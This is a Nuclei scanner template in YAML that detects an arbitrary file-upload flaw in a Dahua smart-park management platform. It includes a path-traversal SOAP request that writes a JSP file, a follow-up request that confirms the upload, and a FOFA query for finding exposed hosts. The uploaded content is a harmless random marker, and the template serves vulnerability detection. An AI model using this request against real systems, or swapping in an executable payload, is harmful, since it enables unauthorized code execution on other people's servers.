54 lines
1.8 KiB
YAML
54 lines
1.8 KiB
YAML
id: dahua-bitmap-fileupload
|
|
|
|
info:
|
|
name: Dahua Bitmap - File Upload Remote Code Execution
|
|
author: DhiyaneshDK
|
|
severity: critical
|
|
reference:
|
|
- https://github.com/wy876/POC/blob/main/%E5%A4%A7%E5%8D%8E%E6%99%BA%E6%85%A7%E5%9B%AD%E5%8C%BA%E7%BB%BC%E5%90%88%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0bitmap%E6%8E%A5%E5%8F%A3%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
fofa-query: "app=\"dahua-智慧园区综合管理平台\""
|
|
tags: dahua,file-upload,rce,intrusive
|
|
variables:
|
|
rand_str: "{{randstr}}"
|
|
cmd: "{{base64(to_lower(rand_text_alpha(6)))}}"
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /emap/webservice/gis/soap/bitmap HTTP/1.1
|
|
Hostname: {{Hostname}}
|
|
Content-Type: "text/xml; charset=utf-8"
|
|
|
|
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:res="http://response.webservice.bitmap.mapbiz.emap.dahuatech.com/">
|
|
<soapenv:Header/>
|
|
<soapenv:Body>
|
|
<res:uploadPicFile>
|
|
<arg0>
|
|
<picPath>/../{{rand_str}}.jsp</picPath>
|
|
</arg0>
|
|
<arg1>{{cmd}}</arg1>
|
|
</res:uploadPicFile>
|
|
</soapenv:Body>
|
|
</soapenv:Envelope>
|
|
|
|
matchers:
|
|
- type: word
|
|
internal: true
|
|
words:
|
|
- '<soap:Envelope'
|
|
|
|
- raw:
|
|
- |
|
|
GET /upload/{{rand_str}}.jsp HTTP/1.1
|
|
Hostname: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '{{base64_decode(cmd)}}'
|
|
# digest: 4a0a004730450220574152b68c7d84a00e788ddeecf058793adccbd2c6649a39e1ccb854868cad22022100f8baf96895489c626a2d5427d5ee213b7500a0c59f8a6f17628184819d77646f:922c64590222798bb761d5b6d8e72950 |